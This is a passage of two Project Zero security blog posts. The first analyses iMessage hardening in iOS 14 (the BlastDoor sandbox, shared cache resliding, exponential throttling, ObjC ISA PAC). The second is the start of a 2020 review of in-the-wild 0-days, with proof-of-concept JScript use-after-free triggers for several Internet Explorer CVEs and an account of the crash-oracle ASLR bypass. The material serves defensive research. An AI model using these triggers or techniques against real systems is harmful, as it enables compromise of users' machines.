Previously, all of this work happened in imagent. With iOS 14, however, it all moved into the new BlastDoor service. While the main processing flow still starts in imagent, which receives the raw but unencrypted payload bytes from identityservicesd (part of the IDS framework) in -[IMDiMessageIDSDelegate service:account:incomingTopLevelMessage:fromID:messageContext:], messages are then more or less immediately forwarded to the BlastDoor service through +[IMBlastdoor sendDictionary:withCompletionBlock:] which creates the reply handler block and then calls -[IMMessagesBlastDoorInterface diffuseTopLevelDictionary:resultHandler:]. At that point processing ends up in Swift code that deserializes the binary payload and sends it to the BlastDoor service over XPC.

Inside BlastDoor, the work mostly happens in BlastDoor.framework and MessagesBlastDoorService. As most of it is written in Swift, it is fairly unpleasant to statically reverse engineer it (no symbols, many virtual calls, swift runtime code sprinkled all over the place), but fortunately, that is also not really necessary for the purpose of this blog post. However, it is worth noting that while the high level control flow logic is written in Swift, some of the parsing steps still involve the existing ObjectiveC or C implementations. For example, XML is being parsed by libxml, and the NSKeyedArchiver payloads by the ObjectiveC implementation of NSKeyedUnarchiver.

The responses from BlastDoor can be seen by breaking on the reply handler function in imagent (the function can be found in +[IMBlastdoor sendDictionary:withCompletionBlock:] or by searching for XREFs to the string “Blastdoor response %p received (command: %hhu, guid: %@)” in IMDaemonCore.framework). A typical BlastDoor response for a simple text message is shown below:

(lldb) po $x2


    metadata: BlastDoor.Metadata(

        messageGUID: D391CC96-9CC6-44C6-B827-1DEB0F252529,

        timestamp: Optional(1610108299117662350),

        wantsDeliveryReceipt: true,

        wantsCheckpointing: false,

        storageContext: BlastDoor.Metadata.StorageContext(

            isFromStorage: false, isLastFromStorage: false



    messageSubType: MessageType.textMessage(BlastDoor.Message(

        plainTextBody: Optional("Hello World"),

        plainTextSubject: nil,

        content: Optional(BlastDoor.AttributedString(

            attributes: [


                    range: Range(0..<11), direction: WritingDirection.natural



                    range: Range(0..<11), partNumber: 0



            string: "Hello World"


        _participantDestinationIdentifiers: [

            "mailto:[email protected]",

            "mailto:[email protected]"


        attributionInfo: []


    encryptionType: BlastDoor.TextMessage.EncryptionType.pair_ec,

    replyToGUID: Optional(6401430E-CDD3-4BC7-A377-7611706B431F),

    _threadIdentifierGUID: nil,

    _expressiveSendStyleIdentifier: nil,

    _groupID: Optional("008412B9-A4F7-4B96-96C3-70C4276CB2BE"),

    currentGroupName: nil,

    groupParticipantVersion: Optional(0),

    groupProtocolVersion: Optional(8),

    groupPhotoCreationTime: nil,

    messageSummaryInfo: nil,

    nicknameInformation: nil,

    truncatedNicknameRecordKey: nil


One can roughly associate every field in this data structure with parts of the on-wire iMessage format. For example, the plainTextBody field contains the content of the `t` field, while the content field corresponds to the content of the `x` field.

Besides simple text messages, iMessages can additionally contain attachments (essentially arbitrary files which are encrypted and temporarily uploaded to iCloud) as well as rather complex serialized NSKeyedArchiver archives, which have been the source of bugs in the past.

For these types of iMessages, the following additional parsing steps are necessary:

  1. Unpack attachment metadata (NSKeyedArchiver format)
  2. Download attachments from iCloud server
  3. Deserialize NSKeyedArchiver plugin archives and generate a preview for the notification

As an example, consider what happens when a user sends a link to a website over iMessage. In that case, the sending device will first render a preview of the webpage and collect some metadata about it (such as the title and page description), then pack those fields into an NSKeyedArchiver archive. This archive is then encrypted with a temporary key and uploaded to the iCloud servers. Finally, the link as well as the decryption key are sent to the receiver as part of the iMessage. In order to create a useful user notification about the incoming iMessage, this data has to be processed by the receiver on a 0-click code path. As that again involves a fair amount of complexity, it is also done inside BlastDoor: after receiving the BlastDoor reply from above and realizing that the message contains an attachment, imagent first instructs IMTransferAgent to download and decrypt the iCloud attachment. Afterwards, it will call into -[IMTranscodeController decodeiMessageAppPayload:bundleID:completionBlock:blockUntilReply:] which forwards the relevant data to the IMTranscoderAgent, which then proceeds into +[IMAttachmentBlastdoor sendBalloonPluginPayloadData:withBundleIdentifier:completionBlock:] and finally calls -[IMMessagesBlastDoorInterface defuseBalloonPluginPayload:withIdentifier:resultHandler:].

In the BlastDoor service, the plugin data decoding is then again performed in Swift, and dispatched to the corresponding plugin type, as determined by the plugin id. For RichLinks (plugin id, processing ends up in LinkPresentation.MessagesPayload.init(dataRepresentation:), which deserializes the NSKeyedArchiver payload and to extract the preview image and URL metadata from it in order to generate a preview message.


The sandbox profile can be found in System/Library/Sandbox/Profiles/ and is also attached at the end of this blog post. It appears to be identical on iOS and macOS. The profile can be studied statically, and for that purpose is attached at the bottom of this blogpost, or dynamically, for example by using the sandbox-exec tool:

> echo "(allow process-exec (literal \"$(pwd)/test\"))" >> ./

> clang -o test test.c   # try to open files, network connections, etc.

> sandbox-exec -f ./ ./test

The sandbox profile states:

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

And indeed, the sandbox profile is quite tight:

  • only a handful of local IPC services, namely diagnosticd, logd, opendirectoryd, syslogd, and notifyd, can be reached
  • almost all file system interaction is blocked
  • any interaction with IOKit drivers (historically a big source of vulnerabilities) is forbidden
  • outbound network access is denied

Furthermore, the profile makes use of syscall filtering to restrict the interactions with the core kernel. However, as of now the syscall filter seems to be in “permissive” mode:

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

As such, the BlastDoor service is still allowed to perform any syscall, but it is to be expected that the syscall filtering will soon be put into “enforcement mode”, which would further boost its effectiveness.

Crash Monitoring?

An interesting side effect of the new processing pipeline is that imagent is now able to detect when an incoming message caused a crash in BlastDoor (it will receive an XPC error). Even more interesting is the fact that imagent appears to be informing Apple’s servers about such events, as can be seen by setting a breakpoint on -[APSConnectionServer handleSendOutgoingMessage:] in apsd, the daemon responsible for implementing Apple’s push services (on top of which iMessage is built). Displaying the outgoing message will show the following:

(lldb) po [$x2 dictionaryRepresentation]


    APSCritical = 1;

    APSMessageID = 543;

    APSMessageIdentifier = 1520040396;

    APSMessageTopic = "";

    APSMessageUserInfo =     {

        c = 115;

        fR = 13500;

        fRM = "";

        fU = {length = 16, bytes = 0x3a4912626c9645f98cb26c7c2d439520};

        i = 1520040396;

        nr = 1;

        t = {length = 32, bytes = ... };

        ua = "[macOS,11.1,20C69,Macmini9,1]";

        v = 7;


    APSOutgoingMessageSenderTokenName = 501;

    APSPayloadFormat = 1;

    APSTimeout = 120;

    APSTimestamp = "2021-01-06 19:52:10 +0000";


As can be seen, imagent is apparently informing the iMessage servers that the message with the UUID 0x3a4912626c9645f98cb26c7c2d439520 (fU key) has caused a crash in BlastDoor.

It is unclear what the purpose of this is without access to the server’s code. While these notifications may simply be used for statistical purposes, they would also give Apple a fairly clear signal about attacks against iMessage involving brute-force and a somewhat weaker signal about any failed exploits against the BlastDoor service.

In my experiments, after observing one of these crash notifications, the server would start directly sending delivery receipts to the sender for messages that hadn't actually been processed by the receiver yet. Possibly this is another, independent effort to break the crash oracle technique by confusing the sender, but that is hard to verify without access to the code running on the server. In any case, it is worth noting that this “spoofing” of delivery receipts by the server is generally possible as the message UUID, which is more or less the only content of a delivery receipt, is part of the non-end2end encrypted payload and is thus known to the server (break on -[APSConnectionServer handleSendOutgoingMessage:] and inspect outgoing iMessages to verify this, the UUID will be in the U key, while the e2e-encrypted data will be in the P key). This is most likely necessary so the server can track which messages have already been delivered and which ones it still needs to keep around for delivery in the future.

Shared Cache Resliding

Previously, when exploiting an iMessage memory corruption bug, a “crash oracle” could be used to reveal the location of the shared cache region in memory: the attacker would trigger the memory corruption bug in a way that would cause an access to a memory location somewhere in the region 0x180000000 - 0x280000000 (where the shared cache can be mapped). If the memory was valid, no crash would occur and imagent would then send a delivery receipt to the attacker. However, If a crash occurred, no such receipt would be delivered, informing the attacker that the address was unmapped. Through clever selection of the queried addresses, the location of the shared cache could be revealed in logarithmic time, with only about 20 messages.

However, with iOS 14 Apple has added a mechanism to re-randomize the location of the shared cache region for an “attacked” process, thus breaking a fundamental assumption of this technique and rendering it ineffective. This is significant as the crash oracle technique was one of very few, if not the only, fairly generic ASLR bypass techniques usable in 0-click iMessage attacks.

To understand how the shared cache resliding works, one can start by looking at the kernel. In iOS 14, the kernel can now have two active shared cache regions: the “regular” region and a “reslided” region. During an attack, the following then happens:

  1. When an attacker attempts to use a crash-oracle-based technique, the attacked process would quickly end up accessing unmapped memory in the range 0x180000000 - 0x280000000 (where the shared cache is mapped) and crashes
  2. The kernel handles the segmentation fault generated by the CPU, and sets a specific flag in the crash info that signals that the crash happened inside the shared cache region
  3. At the same time, the kernel will mark the currently active reslided shared cache region (if one exists) as stale, causing it to be recreated and thus re-randomized the next time it is used
  4. launchd (as the parent process of the crashed service) receives the crash info, notices the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and sets the ReslideSharedCache property on the service associated with the crashed process (see `launchctl procinfo $pid` and search for `reslide shared cache = 1`)
  5. The next time the service is restarted, launchd then adds the POSIX_SPAWN_RESLIDE attribute for posix_spawn due to the ReslideSharedCache property
  6. In the kernel, this flag now causes the newly created process to be given the reslided shared cache image. However, as no active reslided region currently exists (the previous one was marked as stale in step 3.), a new one is created at a newly randomized address.

The result of this is that whenever an attacker attempts to use a crash-oracle to break ASLR, the attacked service would receive a different shared cache region every time it is launched, thus preventing the attack from succeeding. For the time being, this feature appears to only be active on iOS though, but it would be expected to come to macOS as well.

While this mechanism would in principle also protect 3rd party apps from similar attacks, protection for those is currently somewhat weaker, likely in order to first evaluate the real-world performance impact of this change (the shared cache is a significant performance optimization of the OS). In particular, step 3 is currently only performed if the crashing process is a platform binary (essentially binaries that ship with the OS and are directly signed by Apple) such as the services handling iMessages. However, for 3rd party processes, it would only happen if the global vm_shared_region_reslide_restrict is set to zero:


 * Flag to control what processes should get shared cache randomize resliding

 * after a fault in the shared cache region:


 * 0 - all processes get a new randomized slide

 * 1 - only platform processes get a new randomized slide


Which is controlled by the vm_shared_region_reslide_restrict bootarg. This currently seems to be set to one. In essence, for 3rd party apps this means:

  1. When the attacked process first crashes, the kernel will still set the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and launchd will add the ReslideSharedCache property, but the current reslided region won’t be invalidated
  2. The restarted service is then restarted and now uses the “reslided” shared cache region
  3. When the service crashes the next time, and if that service is the only one currently using the reslided shared cache region (which should usually be the case, but could possibly be influenced by the attacker), the region’s refcount drops to zero, and the shared cache region is marked for removal.
  4. However, removal will only actually happen after two minutes. As such, if the service is restarted within two minutes, it will receive the same shared cache region at the same location in memory.

As a result, a third-party app could still be attacked through a crash-oracle technique if it automatically sends some form of delivery receipt to the sender and restarts quickly enough after a crash. This could, however, be prevented for example by enabling ExponentialThrottling for these services. Ideally, and assuming that the performance penalty is reasonable, Apple would enable re-randomization for all apps in the future.

Exponential Throttling

Another thing we suggested back in 2019 was to limit the number of attempts an attacker gets when attempting to exploit a vulnerability. This was mostly important to defend against the crash-oracle technique, but would also help to prevent brute force attacks (e.g., given enough attempts, one could simply brute force the location of the shared cache region). The new ExponentialThrottling feature in launchd seems to achieve just that.

To use it, a system daemon or agent has to opt-in by setting "_ExponentialThrottling = 1” in its Info.plist (essentially the service metadata), as can be seen below for the BlastDoor service:

> plutil -p /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/Versions/A/XPCServices/MessagesBlastDoorService.xpc/Contents/Info.plist


  "CFBundleDisplayName" => "MessagesBlastDoorService"

  "CFBundleExecutable" => "MessagesBlastDoorService"

  "CFBundleIdentifier" => ""


  "XPCService" => {

    "_ExponentialThrottling" => 1



Apart from the BlastDoor service, it is also used for imagent:

> plutil -p /System/Library/LaunchAgents/


  "_ExponentialThrottling" => 1


but doesn’t appear to be used for any other service, as can, for example, be seen by looking at the output of the launchctl dumpstate command, which will only show “exponential throttling = 1” for and

Presumably, the _ExponentialThrottling property instructs launchd (the macOS and iOS init process), to delay subsequent restarts of a crashing service. While it is somewhat challenging to statically reverse engineer launchd due to the lack of source code or binary symbols, it is fortunately fairly easy to experimentally determine the impact of the _ExponentialThrottling property, for example by installing a custom daemon that writes the current timestamp to a file before crashing. By default, so without ExponentialThrottling, one would see the following:

Service started on Wed Jan  6 13:56:03 2021

Service started on Wed Jan  6 13:56:13 2021

Service started on Wed Jan  6 13:56:23 2021

Service started on Wed Jan  6 13:56:33 2021

As can be seen, by default, a service is, at the earliest, restarted ten seconds after it was previously started. However, using the following service plist which enables ExponentialThrottling:

> # Start service with

> # launchctl bootstrap system /Library/LaunchDaemons/net.saelo.test.plist

> plutil -p /Library/LaunchDaemons/net.saelo.test.plist


  "_ExponentialThrottling" => 1

  "KeepAlive" => 1

  "Label" => "net.saelo.test"

  "POSIXSpawnType" => "Interactive"

  "Program" => "/path/to/program"


One can observe the following:

Service started on Wed Jan  6 10:42:43 2021

Service started on Wed Jan  6 10:42:53 2021 (+10s)

Service started on Wed Jan  6 10:43:03 2021 (+10s)

Service started on Wed Jan  6 10:43:13 2021 (+10s)

Service started on Wed Jan  6 10:43:33 2021 (+20s)

Service started on Wed Jan  6 10:44:13 2021 (+40s)

Service started on Wed Jan  6 10:45:33 2021 (+80s)

Service started on Wed Jan  6 10:48:13 2021 (+160s [~2.5m])

Service started on Wed Jan  6 10:53:33 2021 (+320s [~5m])

Service started on Wed Jan  6 11:04:13 2021 (+640s [~10m])

Service started on Wed Jan  6 11:24:13 2021 (+20m)

Service started on Wed Jan  6 11:44:13 2021 (+20m)

Service started on Wed Jan  6 12:04:13 2021 (+20m)

Here, the exponential increase in the time between subsequent restarts is clearly visible, and goes up to an apparent maximum of 20 minutes. And indeed, launchd does contain the following bit of code in a function presumably responsible for computing the next restart delay (search for XREFs to the string "%s: service throttled by %llu seconds"):

  if ( delay >= 1200 )

    result = 1200LL;                 // 20 minutes


    result = delay;

With this change, an exploit that relied on brute force would now only get one attempt every 20 minutes instead of every 10 seconds.

(Upcoming?) ObjectiveC ISA PAC

The PoC exploit against iMessage on iOS 12.4 relied heavily on faking ObjectiveC objects to gain a form of arbitrary code execution despite the presence of pointer authentication (PAC). This was mainly possible because the ISA field, containing the pointer to the Class object and thus making a piece of memory appear like a valid ObjectiveC object, was not protected through PAC and could thus be faked. With iOS 14, this now seems to be changing: while previously, the top 19 bits of the ISA value contained the inline refcount, it now appears that this field has been reduced to 9 bits (of which the LSB appears to be reserved for some purpose, leaving an 8-bit inline refcount, see the bit shifting logic in objc_release or objc_retain), while the freed-up bits now hold a PAC, as can be seen in objc_rootAllocWithZone in libobjc.dylib:

    ; Allocate the object

    BL              j__calloc_3

    CBZ             X0, loc_1953DA434

    MOV             X8, X0

    ; “Tag” the address with a constant to get a PAC modifier value

    MOVK            X8, #0x6AE1,LSL#48        

    MOV             X9, X19

    ; Compute PAC of Class pointer with tagged object address as modifier

    PACDA           X9, X8

    ; Clear top 9 bits (inline refcnt) and bottom 3 bits (other bitfields)       

    AND             X8, X9, #0x7FFFFFFFFFFFF8

    ; Set LSB and inline refcount to one

    MOV             X9, #0x100000000000001

    ORR             X9, X8, X9

    ; Presumably, the refcnt isn’t used for all types of classes...

    TST             W20, #0x2000

    CSEL            X8, X9, X8, EQ

    ; Store the resulting value into the ISA field

    STR             X8, [X0]

However, currently the ISA PAC appears to never be checked, as such, it doesn’t yet affect any exploits. The most likely reason for this is that the ISA PAC feature is being rolled out in multiple phases, with the current implementation meant to allow in-depth performance evaluation, in particular of the reduced size of the inline refcount, which will likely cause more objects to use the more expensive out-of-line refcounting (used once the inline refcount saturates). With that, it can be expected that, in the absence of major performance issues, future releases of iOS and macOS will use PAC for the ObjC ISA field, thus likely breaking exploits that have to rely on faking ObjectiveC objects to achieve arbitrary code execution.


This blog post discussed three improvements in iOS 14 affecting iMessage security: the BlastDoor service, resliding of the shared cache, and exponential throttling. Overall, these changes are probably very close to the best that could’ve been done given the need for backwards compatibility, and they should have a significant impact on the security of iMessage and the platform as a whole. It’s great to see Apple putting aside the resources for these kinds of large refactorings to improve end users’ security. Furthermore, these changes also highlight the value of offensive security work: not just single bugs were fixed, but instead structural improvements were made based on insights gained from exploit development work.

As for the alleged NSO iMessage exploit, it may have been prevented from working against iOS 14 by any of the following:

  • The bug was fixed in iOS 14, for example due to the rewrite of large parts of the iMessage processing pipeline in Swift
  • The mere fact that processing happens in a different process, which could for example break a heap layouting primitive
  • The shared cache resliding would break their exploit if their exploit relied on some form of crash oracle to break ASLR
  • The stronger sandbox of the BlastDoor service, which could prevent the exploitation of a privilege escalation vulnerability after compromising the BlastDoor process

While these are some possible scenarios, and it could be the case that the exploit “just” needs some re-engineering to function again, the fact that these security improvements were shipped is certainly a positive outcome.

Attachment 1:

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.


;;; For all platforms: /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/XPCServices/MessagesBlastDoorService.xpc/MessagesBlastDoorService

(version 1)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Basic Rules

;;; -------------------------------------------------------------------------------------------- ;;;

;; Deny all default rules.

(deny default)

(deny file-map-executable process-info* nvram*)

(deny dynamic-code-generation)

;; Rules copied from Ones that we've deemed overly permissive

;; or unnecessary for BlastDoor have been removed.

;; Allow read access to standard system paths.

(allow file-read*

       (require-all (file-mode #o0004)

                    (require-any (subpath "/System")

                                 (subpath "/usr/lib")

                                 (subpath "/usr/share")

                                 (subpath "/private/var/db/dyld"))))

(allow file-map-executable

       (subpath "/System/Library/CoreServices/RawCamera.bundle")

       (subpath "/usr/lib")

       (subpath "/System/Library/Frameworks"))

(allow file-test-existence (subpath "/System"))

(allow file-read-metadata

       (literal "/etc")

       (literal "/tmp")

       (literal "/var")

       (literal "/private/etc/localtime"))

;; Allow access to standard special files.

(allow file-read*

       (literal "/dev/random")

       (literal "/dev/urandom"))

(allow file-read* file-write-data

       (literal "/dev/null")

       (literal "/dev/zero"))

(allow file-read* file-write-data file-ioctl

       (literal "/dev/dtracehelper"))

;; TODO: Don't allow core dumps to be written out unless this is on a dev

;; fused device?

(allow file-write*

       (require-all (regex #"^/cores/")

                    (require-not (file-mode 0))))

;; Allow IPC to standard system agents.

(allow mach-lookup

       (global-name "")

       (global-name "")

       (global-name "")

       (global-name "")

       (global-name ""))

;; Allow mostly harmless operations.

(allow signal process-info-dirtycontrol process-info-pidinfo

       (target self))

;; Temporarily allow sysctl-read with reporting to see if this is

;; used for anything.

(allow (with report) sysctl-read)

;; We don't need to post any darwin notifications.

(deny darwin-notification-post)

;; We shouldn't allow any other file operations not covered under

;; the default of deny above.

(deny file-clone file-link)

;; Don't deny file-test-existence: <rdar://problem/59611011>

;; (deny file-test-existence)

;; Don't allow access to any IOKit properties.

(deny iokit-get-properties)

(deny mach-cross-domain-lookup)

;; Don't allow BlastDoor to spawn any other XPC services other than

;; ones that we can intentionally whitelist later.

(deny mach-lookup (xpc-service-name-regex #".*"))

;; Don't allow any commands on sockets.

(deny socket-ioctl)

;; Denying this should have no ill effects for our use case.

(deny system-privilege)

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

(allow syscall-unix

       (syscall-number SYS_exit)

       (syscall-number SYS_kevent_qos)

       (syscall-number SYS_kevent_id)

       (syscall-number SYS_thread_selfid)

       (syscall-number SYS_bsdthread_ctl)

       (syscall-number SYS_kdebug_trace64)

       (syscall-number SYS_getattrlist)

       (syscall-number SYS_sigsuspend_nocancel)

       (syscall-number SYS_proc_info)


       (syscall-number SYS___disable_threadsignal)

       (syscall-number SYS___pthread_sigmask)

       (syscall-number SYS___mac_syscall)

       (syscall-number SYS___semwait_signal_nocancel)

       (syscall-number SYS_abort_with_payload)

       (syscall-number SYS_access)

       (syscall-number SYS_bsdthread_create)

       (syscall-number SYS_bsdthread_terminate)

       (syscall-number SYS_close)

       (syscall-number SYS_close_nocancel)

       (syscall-number SYS_connect)

       (syscall-number SYS_csops_audittoken)

       (syscall-number SYS_csrctl)

       (syscall-number SYS_fcntl)

       (syscall-number SYS_fsgetpath)

       (syscall-number SYS_fstat64)

       (syscall-number SYS_fstatfs64)

       (syscall-number SYS_getdirentries64)

       (syscall-number SYS_geteuid)

       (syscall-number SYS_getfsstat64)

       (syscall-number SYS_getgid)

       (syscall-number SYS_getrlimit)

       (syscall-number SYS_getuid)

       (syscall-number SYS_ioctl)

       (syscall-number SYS_issetugid)

       (syscall-number SYS_lstat64)

       (syscall-number SYS_madvise)

       (syscall-number SYS_mmap)

       (syscall-number SYS_munmap)

       (syscall-number SYS_mprotect)

       (syscall-number SYS_mremap_encrypted)

       (syscall-number SYS_open)

       (syscall-number SYS_open_nocancel)

       (syscall-number SYS_openat)

       (syscall-number SYS_pathconf)

       (syscall-number SYS_pread)

       (syscall-number SYS_read)

       (syscall-number SYS_readlink)

       (syscall-number SYS_shm_open)

       (syscall-number SYS_socket)

       (syscall-number SYS_stat64)

       (syscall-number SYS_statfs64)

       (syscall-number SYS_sysctl)

       (syscall-number SYS_sysctlbyname)

       (syscall-number SYS_workq_kernreturn)

       (syscall-number SYS_workq_open)


;; Still allow the system call but report in log.

(allow (with report) syscall-unix)

;; For validating the entitlements of clients. This is so only entitled

;; clients can pass data into a BlastDoor instance.

(allow process-info-codesignature)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Reading Files

;;; -------------------------------------------------------------------------------------------- ;;;

;; Support for BlastDoor receiving sandbox extensions from clients to either read files, or

;; write to a target location.


(allow file-read*

       (extension ""))


(allow file-read* file-write*

       (extension ""))

Déjà vu-lnerability

A Year in Review of 0-days Exploited In-The-Wild in 2020

Posted by Maddie Stone, Project Zero

2020 was a year full of 0-day exploits. Many of the Internet’s most popular browsers had their moment in the spotlight. Memory corruption is still the name of the game and how the vast majority of detected 0-days are getting in. While we tried new methods of 0-day detection with modest success, 2020 showed us that there is still a long way to go in detecting these 0-day exploits in-the-wild. But what may be the most notable fact is that 25% of the 0-days detected in 2020 are closely related to previously publicly disclosed vulnerabilities. In other words, 1 out of every 4 detected 0-day exploits could potentially have been avoided if a more thorough investigation and patching effort were explored. Across the industry, incomplete patches — patches that don’t correctly and comprehensively fix the root cause of a vulnerability — allow attackers to use 0-days against users with less effort.

Since mid-2019, Project Zero has dedicated an effort specifically to track, analyze, and learn from 0-days that are actively exploited in-the-wild. For the last 6 years, Project Zero’s mission has been to “make 0-day hard”. From that came the goal of our in-the-wild program: “Learn from 0-days exploited in-the-wild in order to make 0-day hard.” In order to ensure our work is actually making it harder to exploit 0-days, we need to understand how 0-days are actually being used. Continuously pushing forward the public’s understanding of 0-day exploitation is only helpful when it doesn’t diverge from the “private state-of-the-art”, what attackers are doing and are capable of.

Over the last 18 months, we’ve learned a lot about the active exploitation of 0-days and our work has matured and evolved with it. For the 2nd year in a row, we’re publishing a “Year in Review” report of the previous year’s detected 0-day exploits. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in each individual exploit’s analysis, please check out our root cause analyses.

When looking at the 24 0-days detected in-the-wild in 2020, there’s an undeniable conclusion: increasing investment in correct and comprehensive patches is a huge opportunity for our industry to impact attackers using 0-days. 

A correct patch is one that fixes a bug with complete accuracy, meaning the patch no longer allows any exploitation of the vulnerability. A comprehensive patch applies that fix everywhere that it needs to be applied, covering all of the variants. We consider a patch to be complete only when it is both correct and comprehensive. When exploiting a single vulnerability or bug, there are often multiple ways to trigger the vulnerability, or multiple paths to access it. Many times we’re seeing vendors block only the path that is shown in the proof-of-concept or exploit sample, rather than fixing the vulnerability as a whole, which would block all of the paths. Similarly, security researchers are often reporting bugs without following up on how the patch works and exploring related attacks.

While the idea that incomplete patches are making it easier for attackers to exploit 0-days may be uncomfortable, the converse of this conclusion can give us hope. We have a clear path toward making 0-days harder. If more vulnerabilities are patched correctly and comprehensively, it will be harder for attackers to exploit 0-days.

This vulnerability looks familiar 🤔

As stated in the introduction, 2020 included 0-day exploits that are similar to ones we’ve seen before. 6 of 24 0-days exploits detected in-the-wild are closely related to publicly disclosed vulnerabilities. Some of these 0-day exploits only had to change a line or two of code to have a new working 0-day exploit. This section explains how each of these 6 actively exploited 0-days are related to a previously seen vulnerability. We’re taking the time to detail each and show the minimal differences between the vulnerabilities to demonstrate that once you understand one of the vulnerabilities, it’s much easier to then exploit another.


Vulnerability exploited in-the-wild

Variant of...

Microsoft Internet Explorer


CVE-2018-8653* CVE-2019-1367* CVE-2019-1429*

Mozilla Firefox


Mozilla Bug 1507180

Google Chrome




Microsoft Windows



Google Chrome/Freetype



Apple Safari



* vulnerability was also exploited in-the-wild in previous years


Internet Explorer JScript CVE-2020-0674

CVE-2020-0674 is the fourth vulnerability that’s been exploited in this bug class in 2 years. The other three vulnerabilities are CVE-2018-8653, CVE-2019-1367, and CVE-2019-1429. In the 2019 year-in-review we devoted a section to these vulnerabilities. Google’s Threat Analysis Group attributed all four exploits to the same threat actor. It bears repeating, the same actor exploited similar vulnerabilities four separate times. For all four exploits, the attacker used the same vulnerability type and the same exact exploitation method. Fixing these vulnerabilities comprehensively the first time would have caused attackers to work harder or find new 0-days.

JScript is the legacy Javascript engine in Internet Explorer. While it’s legacy, by default it is still enabled in Internet Explorer 11, which is a built-in feature of Windows 10 computers. The bug class, or type of vulnerability, is that a specific JScript object, a variable (uses the VAR struct), is not tracked by the garbage collector. I’ve included the code to trigger each of the four vulnerabilities below to demonstrate how similar they are. Ivan Fratric from Project Zero wrote all of the included code that triggers the four vulnerabilities.


In December 2018, it was discovered that CVE-2018-8653 was being actively exploited. In this vulnerability, the this variable is not tracked by the garbage collector in the isPrototypeof callback. McAfee also wrote a write-up going through each step of this exploit.

var objs = new Array();

var refs = new Array();

var dummyObj = new Object();

function getFreeRef()


  // 5. delete prototype objects as well as ordinary objects

  for ( var i = 0; i < 10000; i++ ) {

    objs[i] = 1;



  for ( var i = 0; i < 200; i++ )


    refs[i].prototype = 1;


  // 6. Garbage collector frees unused variable blocks.

  // This includes the one holding the "this" variable


  // 7. Boom



// 1. create "special" objects for which isPrototypeOf can be invoked

for ( var i = 0; i < 200; i++ ) {

        var arr = new Array({ prototype: {} });

        var e = new Enumerator(arr);

        refs[i] = e.item();


// 2. create a bunch of ordinary objects

for ( var i = 0; i < 10000; i++ ) {

        objs[i] = new Object();


// 3. create objects to serve as prototypes and set up callbacks

for ( var i = 0; i < 200; i++ ) {

        refs[i].prototype = {};

        refs[i].prototype.isPrototypeOf = getFreeRef;


// 4. calls isPrototypeOf. This sets up refs[100].prototype as "this" variable

// During callback, the "this" variable won't be tracked by the Garbage collector

// use different index if this doesn't work

dummyObj instanceof refs[100];


In September 2019, CVE-2019-1367 was detected as exploited in-the-wild. This is the same vulnerability type as CVE-2018-8653: a JScript variable object is not tracked by the garbage collector. This time though the variables that are not tracked are in the arguments array in the Array.sort callback.

var spray = new Array();

function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in the arguments array

    //    The arguments array isn't tracked by garbage collector

    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JSCript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;


    // 5. But we still have reference to one of them in the

    //    arguments array



// 1. Call sort with a custom callback



The CVE-2019-1367 patch did not actually fix the vulnerability triggered by the proof-of-concept above and exploited in the in-the-wild. The proof-of-concept for CVE-2019-1367 still worked even after the CVE-2019-1367 patch was applied!

In November 2019, Microsoft released another patch to address this gap. CVE-2019-1429 addressed the shortcomings of the CVE-2019-1367 and also fixed a variant. The variant is that the variables in the arguments array are not tracked by the garbage collector in the toJson callback rather than the Array.sort callback. The only difference between the variant triggers is the highlighted lines. Instead of calling the Array.sort callback, we call the toJSON callback.

var spray = new Array();

function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in the arguments array

    //    The arguments array isn't tracked by garbage collector

    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JSCript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;


    // 5. But we still have reference to one of them in the

    //    arguments array



+  // 1. Cause toJSON callback to fire

+  var o = {toJSON:F}

+  JSON.stringify(o);

-  // 1. Call sort with a custom callback

-  [1,2].sort(F);


In January 2020, CVE-2020-0674 was detected as exploited in-the-wild. The vulnerability is that the named arguments are not tracked by the garbage collector in the Array.sort callback. The only changes required to the trigger for CVE-2019-1367 is to change the references to arguments[] to one of the arguments named in the function definition. For example, we replaced any instances of arguments[0] with arg1.

var spray = new Array();

+  function F(arg1, arg2) {

-  function F() {

    // 2. Create a bunch of objects

    for (var i = 0; i < 20000; i++) spray[i] = new Object();

    // 3. Store a reference to one of them in one of the named arguments

    //    The named arguments aren't tracked by garbage collector

+    arg1 = spray[5000];

-    arguments[0] = spray[5000];

    // 4. Delete the objects and call the garbage collector

    //    All JScript variables get reclaimed...

    for (var i = 0; i < 20000; i++) spray[i] = 1;


    // 5. But we still have reference to one of them in

    //   a named argument

+    alert(arg1);

-    alert(arguments[0]);


// 1. Call sort with a custom callback



Unfortunately CVE-2020-0674 was not the end of this story, even though it was the fourth vulnerability of this type to be exploited in-the-wild. In April 2020, Microsoft patched CVE-2020-0968, another Internet Explorer JScript vulnerability. When the bulletin was first released, it was designated as exploited in-the-wild, but the following day, Microsoft changed this field to say it was not exploited in-the-wild (see the revisions section at the bottom of the advisory).

var spray = new Array();

function f1() {

  alert('callback 1');

  return spray[6000];


function f2() {

  alert('callback 2');

  spray = null;


  return 'a'


function boom() {

  var e = o1;

  var d = o2;

  // 3. the first callback (e.toString) happens

  //    it returns one of the string variables

  //    which is stored in a temporary variable

  //    on the stack, not tracked by garbage collector

  // 4. Second callback (d.toString) happens

  //    There, string variables get freed

  //    and the space reclaimed

  // 5. Crash happens when attempting to access

  //    string content of the temporary variable

  var b = e + d;



// 1. create two objects with toString callbacks

var o1 = { toString: f1 };

